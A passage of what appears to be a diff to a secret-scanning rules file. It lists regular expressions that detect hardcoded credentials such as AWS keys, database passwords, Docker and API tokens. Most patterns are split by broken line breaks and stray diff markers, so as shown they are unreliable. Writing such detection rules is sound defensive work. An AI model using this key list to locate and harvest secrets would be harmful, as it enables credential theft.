]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?droplet[_-]?travis[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dropbox[_-]?oauth[_-]?bearer[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?doordash[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dockerhubpassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dockerhub[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?postgres[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?passwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?hub[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?digitalocean[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dgpg[_-]?passphrase[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?secure[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ddgc[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ddg[_-]?test[_-]?email[_-]?pw[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ddg[_-]?test[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?pw[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?connection[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?datadog[_-]?app[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?datadog[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?port[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?danger[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cypress[_-]?record[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coverity[_-]?scan[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coveralls[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coveralls[_-]?repo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coveralls[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cos[_-]?secrets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?conversation[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?conversation[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?v2[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?integration[_-]?management[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?cma[_-]?test[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?consumerkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?consumer[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?conekta[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coding[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?codecov[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?codeclimate[_-]?repo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?codacy[_-]?project[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cocoapods[_-]?trunk[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cocoapods[_-]?trunk[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?clu[_-]?repo[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudinary[_-]?url[_-]?staging[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudinary[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?auth[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?auth[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?service[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?processed[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?parsed[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?order[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?instance[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?audited[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?archived[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloud[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?clojars[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cli[_-]?e2e[_-]?cma[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?superuser[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?db[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?user[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?server[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?registry[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?project[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?deploy[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?chrome[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?chrome[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cheverny[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cf[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?certificate[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?censys[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cattle[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cattle[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cargo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cache[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bx[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bx[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bundlesize[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?built[_-]?branch[_-]?deploy[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?browserstack[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?browser[_-]?stack[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?pwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?pass[_-]?prod[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintraykey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?gpg[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?b2[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?b2[_-]?app[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awssecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awscn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awscn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awsaccesskeyid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secrets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?config[_-]?secretaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?config[_-]?accesskeyid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?access[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?author[_-]?npm[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?author[_-]?email[_-]?addr[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?auth0[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?auth0[_-]?api[_-]?clientsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?assistant[_-]?iam[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifactory[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?argos[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?apple[_-]?id[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?appclientsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?secrete[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?report[_-]?token[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?bucket[_-]?perm[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?apigw[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?apiary[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?key[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aos[_-]?sec[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aos[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ansible[_-]?vault[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?android[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?anaconda[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?amazon[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?amazon[_-]?bucket[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?alicloud[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?alicloud[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?alias[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?search[_-]?key[_-]?1[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?search[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?search[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?search[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?mcm[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']" - - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[^(null)][\"']?[\\w-]+[\"']?" - - 